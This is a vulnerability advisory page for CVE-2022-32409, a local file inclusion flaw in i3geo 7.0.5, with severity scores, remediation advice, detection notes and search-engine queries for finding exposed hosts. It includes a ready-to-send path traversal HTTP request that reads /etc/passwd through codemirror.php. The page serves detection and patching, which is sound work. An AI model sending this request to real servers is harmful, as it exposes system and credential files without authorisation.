🔙 목록으로 돌아가기

CVE-2022-32409: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion

TitlePortal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion
Authorpikpikcu
SeverityCritical
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
RemediationApply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.
CVSS Score9.8
EPSS Score0.66547
CVE IDCVE-2022-32409
CWE IDCWE-22
Shodan Queryhttp.html:"i3geo"
Fofa Querybody="i3geo"
Tags cve2022 cve i3geo lfi softwarepublico vkev vuln

🔍 Vulnerability Description

Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.

🌐 HTTP Request

GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32409.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-32409.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A